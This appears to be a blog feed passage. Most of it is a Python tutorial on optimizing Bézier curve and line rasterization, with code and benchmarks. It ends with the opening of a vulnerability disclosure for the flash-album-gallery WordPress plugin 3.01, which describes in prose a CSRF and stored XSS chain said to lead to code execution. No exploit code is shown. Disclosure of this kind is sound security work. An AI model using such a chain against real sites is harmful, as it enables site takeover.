<p><em>Spare on function calls.</em> Function calls are a nice way to separate
concepts logically and organize your code (structured/imperative
programming), but you shouldn't use them excessively in time-critical
code. But why? Every function call creates a new stack frame, and
working on the stack in RAM is considerably slower than using
CPU registers directly. This is also the reason why recursion is so
inefficient (recursion = many, many stack frames). To pick up the
example above: when we integrate the functions
<code>quadratic_bezier_sum</code> and <code>cubic_bezier_sum</code> into the calling
functions, we eliminate two function calls per loop iteration, i.e. about
2000 calls per curve (assuming we
increase the parameter t in each loop by 0.001). This means
we spare about 1,000,000 function calls when we draw 500 splines. So
remember: don't put too many function calls inside the body of
your loops. You can examine the updated functions called
<code>_draw_(quadratic|cubic)_bez</code> on GitHub
<a href="https://github.com/NikolaiT/CunningCaptcha/blob/master/python_tests/geoprim.py">here</a>.
This and the previous point together bring us the following
performance boost over the inefficient code at the start of this
post: </p>
<div class="highlight"><pre><span></span><code>[+] Testing task is to draw 500 randomly generated Bézier splines with different algorithms. Approximation uses 20 segments.
[!] Testing unoptimized quadratic bezier with direct approach - elapsed time: 2512.458563 ms
[!] Testing unoptimized cubic curves with direct approach - elapsed time: 3192.077160 ms
[!] Testing quadratic bezier curves with direct approach - elapsed time: 2277.250528 ms
[!] Testing cubic bezier curves with direct approach - elapsed time: 2857.527494 ms
</code></pre></div>
<p>
That's roughly a 10% performance increase after all! Not bad for a start :)</p>
<p><em>Be aware of multiplications/divisions.</em> The more operations you can
eliminate, the better. Usually, multiplications are slower than
additions, so you might try to algebraically simplify your
calculations or find other ways to use fewer arithmetic operations.
In my case there would be a technique called fast forward
differencing, which is based on Taylor series. This technique is especially
nice when you want to speed up the rasterization of big, complex
splines, but it pays off less when you need to draw many comparatively simple
curves, as I do in my font project. Therefore I won't make use of
it. However, if you want to learn it, <a href="http://scratchapixel.com/lessons/3d-basic-lessons/lesson-11-rendering-the-teapot-bezier-surfaces/fast-forward-differencing/">here you
go.</a></p>
<p><em>Precalculate stuff.</em> Just use look-up tables. Especially in my case,
look-up tables will help to speed up the algorithms a great deal.
This means I will precompute all coefficients for the Bézier
splines (3 coefficients in case of quadratic splines, 4 in case of
cubic curves). Suppose I am going to draw 500 cubic Bézier curves,
and each curve consists of 1000 points. Accordingly, the algorithm
will calculate a table of 1000 entries, and each entry consists of
the 4 coefficients (or 3 when plotting quadratic splines).
That's around <code>4*8*1000=32kb</code> of RAM to hold all possible
coefficients, not really much given the 6-8 GB of built-in RAM that is common
nowadays ;). Here is the relevant code excerpt that shows the
generation of the look-up table:</p>
<div class="highlight"><pre><span></span><code><span class="k">def</span> <span class="nf">_quadratic_bez_lut</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">p1</span><span class="p">,</span> <span class="n">p2</span><span class="p">,</span> <span class="n">p3</span><span class="p">):</span>
    <span class="n">t</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="c1"># Build the table only once: it depends on t, not on the control points.</span>
    <span class="k">if</span> <span class="ow">not</span> <span class="bp">self</span><span class="o">.</span><span class="n">_LUT_Q</span><span class="p">:</span>
        <span class="c1">#print('[i] lut generating for quadratic splines...')</span>
        <span class="k">while</span> <span class="p">(</span><span class="n">t</span> <span class="o">&lt;</span> <span class="mi">1</span><span class="p">):</span>
            <span class="n">t2</span> <span class="o">=</span> <span class="n">t</span><span class="o">*</span><span class="n">t</span>
            <span class="n">mt</span> <span class="o">=</span> <span class="mi">1</span><span class="o">-</span><span class="n">t</span>
            <span class="n">mt2</span> <span class="o">=</span> <span class="n">mt</span><span class="o">*</span><span class="n">mt</span>
            <span class="bp">self</span><span class="o">.</span><span class="n">_LUT_Q</span><span class="p">[</span><span class="n">t</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="n">mt2</span><span class="p">,</span> <span class="mi">2</span><span class="o">*</span><span class="n">mt</span><span class="o">*</span><span class="n">t</span><span class="p">,</span> <span class="n">t2</span><span class="p">)</span>
            <span class="n">t</span> <span class="o">+=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_STEP</span>
    <span class="c1"># Reuse the cached coefficients for this curve's control points.</span>
    <span class="k">for</span> <span class="n">v</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">_LUT_Q</span><span class="o">.</span><span class="n">values</span><span class="p">():</span>
        <span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">p1</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="n">p2</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="n">p3</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">2</span><span class="p">]),</span> <span class="nb">int</span><span class="p">(</span><span class="n">p1</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="n">p2</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="n">p3</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">_plot_pixel</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">_cubic_bez_lut</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">p1</span><span class="p">,</span> <span class="n">p2</span><span class="p">,</span> <span class="n">p3</span><span class="p">,</span> <span class="n">p4</span><span class="p">):</span>
    <span class="n">t</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="c1"># Same idea as above, with four coefficients per value of t.</span>
    <span class="k">if</span> <span class="ow">not</span> <span class="bp">self</span><span class="o">.</span><span class="n">_LUT_C</span><span class="p">:</span>
        <span class="c1">#print('[i] lut generating for cubic splines...')</span>
        <span class="k">while</span> <span class="p">(</span><span class="n">t</span> <span class="o">&lt;</span> <span class="mi">1</span><span class="p">):</span>
            <span class="n">t2</span> <span class="o">=</span> <span class="n">t</span><span class="o">*</span><span class="n">t</span>
            <span class="n">t3</span> <span class="o">=</span> <span class="n">t2</span><span class="o">*</span><span class="n">t</span>
            <span class="n">mt</span> <span class="o">=</span> <span class="mi">1</span><span class="o">-</span><span class="n">t</span>
            <span class="n">mt2</span> <span class="o">=</span> <span class="n">mt</span><span class="o">*</span><span class="n">mt</span>
            <span class="n">mt3</span> <span class="o">=</span> <span class="n">mt2</span><span class="o">*</span><span class="n">mt</span>
            <span class="bp">self</span><span class="o">.</span><span class="n">_LUT_C</span><span class="p">[</span><span class="n">t</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="n">mt3</span><span class="p">,</span> <span class="mi">3</span><span class="o">*</span><span class="n">mt2</span><span class="o">*</span><span class="n">t</span><span class="p">,</span> <span class="mi">3</span><span class="o">*</span><span class="n">mt</span><span class="o">*</span><span class="n">t2</span><span class="p">,</span> <span class="n">t3</span><span class="p">)</span>
            <span class="n">t</span> <span class="o">+=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_STEP</span>
    <span class="k">for</span> <span class="n">v</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">_LUT_C</span><span class="o">.</span><span class="n">values</span><span class="p">():</span>
        <span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">p1</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="n">p2</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="n">p3</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">+</span> <span class="n">p4</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">3</span><span class="p">]),</span> <span class="nb">int</span><span class="p">(</span><span class="n">p1</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="n">p2</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="n">p3</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">+</span> <span class="n">p4</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">v</span><span class="p">[</span><span class="mi">3</span><span class="p">])</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">_plot_pixel</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span>
</code></pre></div>
<p>And here are the performance results: </p>
<p><code>[+] Testing task is to draw 500 randomly generated Bézier splines with different algorithms. Approximation uses 20 segments. [!] Testing quadratic bezier curves with direct approach - elapsed time: 2320.041656 ms [!] Testing cubic bezier curves with direct approach - elapsed time: 2830.367804 ms [!] Testing quadratic bezier curves with lookup tables - elapsed time: 1840.610504 ms [!] Testing cubic bezier curves with lookup tables - elapsed time: 2220.727682 ms</code><br>
This means we get another performance boost of roughly 20% (the quadratic and
cubic computations benefit by about the same percentage)! Honestly, I
expected more from using look-up tables. Please leave a comment in
case I implemented them wrong.</p>
</li>
<li>
<p><em>Approximate.</em> Why even calculate 1000 points? Usually you can't
even appreciate the smoothness of such a curve, because the splines
are just not big enough in the end (for instance in the final
captcha). Performance, however, is always good to have ;) That being
said, I will proceed as follows: Instead of iterating 1000 times, I
will simply iterate 15 times and thus evaluate the Bézier equation
only 15 times. Then I will just connect these 15 points with
straight lines. Let's see how fast this and all the previous techniques
combined will make the algorithm (note that the precalculation
trick and the approximation overlap performance-wise, because
the look-up table is nowhere near as useful as before once we
evaluate the equation only 15 times). Here's the updated code
together with the final performance results. First the approximation
code:</p>
<div class="highlight"><pre><span></span><code><span class="k">def</span> <span class="nf">_approx_quadratic_bez</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">p1</span><span class="p">,</span> <span class="n">p2</span><span class="p">,</span> <span class="n">p3</span><span class="p">):</span>
    <span class="n">lp</span> <span class="o">=</span> <span class="p">[]</span>
    <span class="n">lp</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">p1</span><span class="p">)</span>
    <span class="c1"># Start at 1 (p1 is already in the list) and include t = 1,</span>
    <span class="c1"># so that the polyline reaches the end point of the curve.</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">_NUM_SEGMENTS</span> <span class="o">+</span> <span class="mi">1</span><span class="p">):</span>
        <span class="n">t</span> <span class="o">=</span> <span class="n">i</span> <span class="o">/</span> <span class="bp">self</span><span class="o">.</span><span class="n">_NUM_SEGMENTS</span>
        <span class="n">t2</span> <span class="o">=</span> <span class="n">t</span><span class="o">*</span><span class="n">t</span>
        <span class="n">mt</span> <span class="o">=</span> <span class="mi">1</span><span class="o">-</span><span class="n">t</span>
        <span class="n">mt2</span> <span class="o">=</span> <span class="n">mt</span><span class="o">*</span><span class="n">mt</span>
        <span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">p1</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">mt2</span> <span class="o">+</span> <span class="n">p2</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="mi">2</span><span class="o">*</span><span class="n">mt</span><span class="o">*</span><span class="n">t</span> <span class="o">+</span> <span class="n">p3</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">t2</span><span class="p">),</span> <span class="nb">int</span><span class="p">(</span><span class="n">p1</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">mt2</span> <span class="o">+</span> <span class="n">p2</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="mi">2</span><span class="o">*</span><span class="n">mt</span><span class="o">*</span><span class="n">t</span> <span class="o">+</span> <span class="n">p3</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">t2</span><span class="p">)</span>
        <span class="n">lp</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">Point</span><span class="p">(</span><span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">))</span>
    <span class="c1"># Connect consecutive points with straight lines.</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">lp</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">):</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">line</span><span class="p">([</span><span class="n">lp</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">lp</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">]])</span>

<span class="k">def</span> <span class="nf">_approx_cubic_bez</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">p1</span><span class="p">,</span> <span class="n">p2</span><span class="p">,</span> <span class="n">p3</span><span class="p">,</span> <span class="n">p4</span><span class="p">):</span>
    <span class="n">lp</span> <span class="o">=</span> <span class="p">[]</span>
    <span class="n">lp</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">p1</span><span class="p">)</span>
    <span class="c1"># Same sampling as in the quadratic case: t = 1/N, 2/N, ..., 1.</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">_NUM_SEGMENTS</span> <span class="o">+</span> <span class="mi">1</span><span class="p">):</span>
        <span class="n">t</span> <span class="o">=</span> <span class="n">i</span> <span class="o">/</span> <span class="bp">self</span><span class="o">.</span><span class="n">_NUM_SEGMENTS</span>
        <span class="n">t2</span> <span class="o">=</span> <span class="n">t</span> <span class="o">*</span> <span class="n">t</span>
        <span class="n">t3</span> <span class="o">=</span> <span class="n">t2</span> <span class="o">*</span> <span class="n">t</span>
        <span class="n">mt</span> <span class="o">=</span> <span class="mi">1</span><span class="o">-</span><span class="n">t</span>
        <span class="n">mt2</span> <span class="o">=</span> <span class="n">mt</span> <span class="o">*</span> <span class="n">mt</span>
        <span class="n">mt3</span> <span class="o">=</span> <span class="n">mt2</span> <span class="o">*</span> <span class="n">mt</span>
        <span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">p1</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">mt3</span> <span class="o">+</span> <span class="mi">3</span><span class="o">*</span><span class="n">p2</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">mt2</span><span class="o">*</span><span class="n">t</span> <span class="o">+</span> <span class="mi">3</span><span class="o">*</span><span class="n">p3</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">mt</span><span class="o">*</span><span class="n">t2</span> <span class="o">+</span> <span class="n">p4</span><span class="o">.</span><span class="n">x</span><span class="o">*</span><span class="n">t3</span><span class="p">),</span> <span class="nb">int</span><span class="p">(</span><span class="n">p1</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">mt3</span> <span class="o">+</span> <span class="mi">3</span><span class="o">*</span><span class="n">p2</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">mt2</span><span class="o">*</span><span class="n">t</span> <span class="o">+</span> <span class="mi">3</span><span class="o">*</span><span class="n">p3</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">mt</span><span class="o">*</span><span class="n">t2</span> <span class="o">+</span> <span class="n">p4</span><span class="o">.</span><span class="n">y</span><span class="o">*</span><span class="n">t3</span><span class="p">)</span>
        <span class="n">lp</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">Point</span><span class="p">(</span><span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">))</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">lp</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">):</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">line</span><span class="p">([</span><span class="n">lp</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">lp</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">]])</span>
</code></pre></div>
<p>And now all performance results together: </p>
<p><code>[+] Testing task is to draw 500 randomly generated Bézier splines with different algorithms. Approximation uses 20 segments. [!] Testing quadratic bezier curves with De Casteljaus algorithm - elapsed time: 7362.981081 ms [!] Testing cubic bezier curves with De Casteljaus algorithm - elapsed time: 11826.589823 ms [!] Testing unoptimized quadratic bezier with direct approach - elapsed time: 2533.061028 ms [!] Testing unoptimized cubic curves with direct approach - elapsed time: 3126.898527 ms [!] Testing quadratic bezier curves with direct approach - elapsed time: 2231.390953 ms [!] Testing cubic bezier curves with direct approach - elapsed time: 2773.490906 ms [!] Testing quadratic bezier curves with lookup tables - elapsed time: 1845.245123 ms [!] Testing cubic bezier curves with lookup tables - elapsed time: 2269.758940 ms [!] Testing quadratic bezier curves with approximation - elapsed time: 252.831936 ms [!] Testing cubic bezier curves with approximation - elapsed time: 286.973476 ms</code><br>
BOOM! The approximation needs a stunning 287 milliseconds to plot 500
random cubic Bézier splines, whereas De Casteljau's algorithm takes
almost 12 seconds! That's around 41 times faster! You say the approximation looks
ugly? Maybe you're right, but for my purposes it's certainly enough.
Here's a picture of a spline plotted with the approximation method
(on the left) and De Casteljau's algorithm (on the right). In my
opinion there is no big difference (from this perspective, and for
the captcha purposes, the resolution is really sufficient).<br>
<img alt="Comparison" src="https://incolumitas.com/uploads/2013/10/approx_vs_castel-1024x576.png">
Both splines are identical. On the left is the curve approximated
(fast) and on the right drawn with De Casteljau's algorithm
(slow).</p>
<p><img alt="Comparison of De Casteljau's algorithm and the approximative method" src="https://incolumitas.com/uploads/2013/10/approx_vs_casteljau2-1024x576.png"></p>
<p>Both splines are exactly the same. On the left is the curve
approximated by lines (fast) and on the right drawn with De
Casteljau's algorithm (slow).</p>
</li>
</ul>
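<p>The precalculation and approximation ideas from the list above can also be combined. The following is only a minimal sketch and not the code from the repository: the names <code>bernstein_table</code> and <code>flatten_cubic</code> are made up for illustration, points are assumed to be plain <code>(x, y)</code> tuples, and the table is indexed by an integer step instead of a floating point <code>t</code>, so the loop counter cannot accumulate rounding errors.</p>

```python
from functools import lru_cache


@lru_cache(maxsize=None)
def bernstein_table(num_segments):
    """Cubic Bernstein coefficients for t = i / num_segments, i = 0..num_segments.

    Hypothetical helper: computed once per segment count and then reused
    for every curve that is drawn with the same resolution.
    """
    table = []
    for i in range(num_segments + 1):
        t = i / num_segments
        mt = 1 - t
        table.append((mt * mt * mt, 3 * mt * mt * t, 3 * mt * t * t, t * t * t))
    return tuple(table)


def flatten_cubic(p1, p2, p3, p4, num_segments=15):
    """Return num_segments + 1 integer points approximating the cubic curve."""
    points = []
    for b0, b1, b2, b3 in bernstein_table(num_segments):
        x = p1[0] * b0 + p2[0] * b1 + p3[0] * b2 + p4[0] * b3
        y = p1[1] * b0 + p2[1] * b1 + p3[1] * b2 + p4[1] * b3
        points.append((int(round(x)), int(round(y))))
    return points


# Example: one curve with arbitrary control points, flattened into 15 segments.
polyline = flatten_cubic((0, 0), (0, 100), (100, 100), (100, 0))
```

<p>Consecutive points of the returned list can then be connected with a line routine such as the one in the next section. Because the table only depends on the number of segments, it is shared by all 500 curves of the benchmark scenario.</p>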
<h3>Conclusion</h3>
<p>We saw some performance boosting techniques. From the initial 7.3 seconds
with De Casteljau's algorithm (plotting 500 quadratic splines), we made
it down to 0.252 seconds! That's around 29 times faster. Of course we
could do better, but let's stop here!</p>
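<p>The speed-up factors can be recomputed from the last benchmark run above. A small sketch (the dictionary layout and the variable names are chosen for illustration; only the numbers are taken from the benchmark output):</p>

```python
# Timings in milliseconds, copied from the last benchmark run above.
timings_ms = {
    "quadratic": {"de_casteljau": 7362.981081, "approximation": 252.831936},
    "cubic": {"de_casteljau": 11826.589823, "approximation": 286.973476},
}

# Speed-up factor = slow time divided by fast time.
speedups = {
    kind: t["de_casteljau"] / t["approximation"]
    for kind, t in timings_ms.items()
}

for kind, factor in speedups.items():
    print(f"{kind}: {factor:.1f}x faster")
```

<p>This gives a factor of roughly 29 for the quadratic splines and roughly 41 for the cubic ones.</p>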
<h3>Drawing Lines</h3>
<p>That's almost it! We also need an algorithm for plotting straight lines.
Maybe you think that's a trivial task, but not so fast, my dear. There's
actually <a href="http://en.wikipedia.org/wiki/Bresenham's_line_algorithm">quite a bit of
math</a> behind
even simple lines! I adopted the algorithm from <a href="http://members.chello.at/easyfilter/bresenham.html">this
site</a>, which also offers
a 100-page essay about plotting geometrical primitives. The
text is quite hard to understand if you don't possess profound
mathematical knowledge, but it's still worth a glimpse!</p>
<p>Anyway, this is the line plotting algorithm:</p>
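<div class="highlight"><pre><span></span><code><span class="c1"># Yet another implementation taken from</span>
<span class="c1"># http://members.chello.at/easyfilter/bresenham.html</span>
<span class="c1"># This algorithm is capable of plotting all possible lines in a 2d plane.</span>
<span class="k">def</span> <span class="nf">line</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">points</span><span class="p">):</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">points</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">2</span> <span class="ow">or</span> <span class="ow">not</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">points</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="nb">tuple</span><span class="p">):</span>
        <span class="k">raise</span> <span class="n">InvalidInputError</span><span class="p">(</span><span class="s1">'To draw a line we need a list of two tuples containing two ints'</span><span class="p">)</span>
    <span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">y0</span><span class="p">),</span> <span class="p">(</span><span class="n">x1</span><span class="p">,</span> <span class="n">y1</span><span class="p">)</span> <span class="o">=</span> <span class="n">points</span>
    <span class="n">dx</span> <span class="o">=</span> <span class="nb">abs</span><span class="p">(</span><span class="n">x1</span><span class="o">-</span><span class="n">x0</span><span class="p">)</span>
    <span class="n">dy</span> <span class="o">=</span> <span class="o">-</span><span class="nb">abs</span><span class="p">(</span><span class="n">y1</span><span class="o">-</span><span class="n">y0</span><span class="p">)</span>
    <span class="c1"># Step directions, error term and loop head follow the C reference on the site above.</span>
    <span class="n">sx</span> <span class="o">=</span> <span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">][</span><span class="n">x0</span> <span class="o">&lt;</span> <span class="n">x1</span><span class="p">]</span>
    <span class="n">sy</span> <span class="o">=</span> <span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">][</span><span class="n">y0</span> <span class="o">&lt;</span> <span class="n">y1</span><span class="p">]</span>
    <span class="n">err</span> <span class="o">=</span> <span class="n">dx</span> <span class="o">+</span> <span class="n">dy</span>
    <span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">_plot_pixel</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">y0</span><span class="p">)</span>
        <span class="k">if</span> <span class="n">x0</span> <span class="o">==</span> <span class="n">x1</span> <span class="ow">and</span> <span class="n">y0</span> <span class="o">==</span> <span class="n">y1</span><span class="p">:</span>
            <span class="k">break</span>
        <span class="n">e2</span> <span class="o">=</span> <span class="mi">2</span><span class="o">*</span><span class="n">err</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">e2</span> <span class="o">&gt;=</span> <span class="n">dy</span><span class="p">):</span>
            <span class="n">err</span> <span class="o">+=</span> <span class="n">dy</span>
            <span class="n">x0</span> <span class="o">+=</span> <span class="n">sx</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">e2</span> <span class="o">&lt;=</span> <span class="n">dx</span><span class="p">):</span>
            <span class="n">err</span> <span class="o">+=</span> <span class="n">dx</span>
            <span class="n">y0</span> <span class="o">+=</span> <span class="n">sy</span>
</code></pre></div>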
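<p>To try the algorithm without the surrounding class, here is a standalone sketch of the same Bresenham scheme. The function name <code>bresenham</code> and the choice to return a list of pixels instead of plotting them are assumptions made for this example, not part of the original code.</p>

```python
def bresenham(x0, y0, x1, y1):
    """Return the integer pixels on the line from (x0, y0) to (x1, y1)."""
    dx = abs(x1 - x0)
    dy = -abs(y1 - y0)
    sx = 1 if x0 < x1 else -1   # step direction along x
    sy = 1 if y0 < y1 else -1   # step direction along y
    err = dx + dy               # combined error term
    pixels = []
    while True:
        pixels.append((x0, y0))
        if x0 == x1 and y0 == y1:
            break
        e2 = 2 * err
        if e2 >= dy:            # error allows a step in x
            err += dy
            x0 += sx
        if e2 <= dx:            # error allows a step in y
            err += dx
            y0 += sy
    return pixels


print(bresenham(0, 0, 5, 2))
# prints [(0, 0), (1, 0), (2, 1), (3, 1), (4, 2), (5, 2)]
```

<p>Only integer additions and comparisons are used inside the loop, which is what makes this scheme attractive for rasterization.</p>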
<p>I have shown you some rasterization algorithms and now I am ready to use
them to draw my font. In the next article, I will use this code! So stay
tuned and send me a letter for Christmas!
</p>No 2. - flash-album-gallery: persistent XSS exploitet with help of XSRF leading to remote code execution.2013-07-27T15:44:00+02:002013-07-27T15:44:00+02:00Nikolai Tschachertag:incolumitas.com,2013-07-27:/2013/07/27/no-2-flash-album-gallery-persistent-xss-exploitet-with-help-of-xsrf-leading-to-remote-code-execution-k/<p><strong>PLUGIN:</strong> http://wordpress.org/plugins/flash-album-gallery/<br>
<strong>AFFECTED VERSION:</strong> 3.01<br>
<strong>DOWNLOADS:</strong> 840,714<br>
<strong>RISK:</strong> MEDIUM/HIGH</p>
<p>The following blog post addresses a critical chain of security issues
in version 3.01 of flash-album-gallery
which eventually leads to remote code execution. The exploit is not
completely automatic and needs a minimal amount
of social engineering. Nevertheless, I rate the danger at a medium/high
level (probably even worse than a fully automatable SQL injection).</p>
<p>First of all, I need to say that the plugin code lacks a fair amount of
secure programming techniques and has inherent design flaws, as far
as I can tell (I am not a software engineer, I do security as a
hobby). Presumably, this is a direct result of the heterogeneous and
evolutionary growth of the software.<br>
I researched flash-album-gallery mainly in June 2013 and after some
weeks I found a CSRF vulnerability in combination with
a stored XSS. But just as I was preparing to contact the
author and reveal my findings, I noticed a new version, and
the bug seemed to have been found by an independent researcher. See below the
lines <em>Fix: vulnerability with albums</em> and <em>Fix: XSS bugs reported by Ken S for the White Fir Design Bug
Bounty</em>.</p>
<div class="highlight"><pre><span></span><code><span class="o">=</span><span class="w"> </span><span class="n">v3</span><span class="o">.</span><span class="mi">00</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mf">26.06</span><span class="o">.</span><span class="mi">2013</span><span class="w"> </span><span class="o">=</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">Fix</span><span class="p">:</span><span class="w"> </span><span class="n">Free</span><span class="w"> </span><span class="n">skins</span><span class="w"> </span><span class="n">settings</span><span class="w"> </span><span class="n">reset</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">default</span><span class="w"> </span><span class="n">after</span><span class="w"> </span><span class="n">plugin</span><span class="w"> </span><span class="n">update</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">Fix</span><span class="p">:</span><span class="w"> </span><span class="n">XSS</span><span class="w"> </span><span class="n">bugs</span><span class="w"> </span><span class="n">reported</span><span class="w"> </span><span class="n">by</span><span class="w"> </span><span class="n">Ken</span><span class="w"> </span><span class="n">S</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">White</span><span class="w"> </span><span class="n">Fir</span><span class="w"> </span><span class="n">Design</span><span class="w"> </span><span class="n">Bug</span><span class="w"> </span><span class="n">Bounty</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">Fix</span><span class="p">:</span><span class="w"> </span><span class="n">small</span><span class="w"> </span><span class="n">bugfixes</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">New</span><span class="p">:</span><span class="w"> </span><span class="n">iOS</span><span class="w"> </span><span class="n">application</span><span class="w"> </span><span class="s1">'MyPGC'</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">Flagallery</span><span class="w"> </span><span class="n">plugin</span><span class="w"> </span><span class="n">now</span><span class="w"> </span><span class="n">available</span><span class="w"> </span><span class="n">on</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">App</span><span class="w"> </span><span class="n">Store</span><span class="w"></span>
<span class="o">=</span><span class="w"> </span><span class="n">v2</span><span class="o">.</span><span class="mi">78</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mf">26.06</span><span class="o">.</span><span class="mi">2013</span><span class="w"> </span><span class="o">=</span><span class="w"></span>
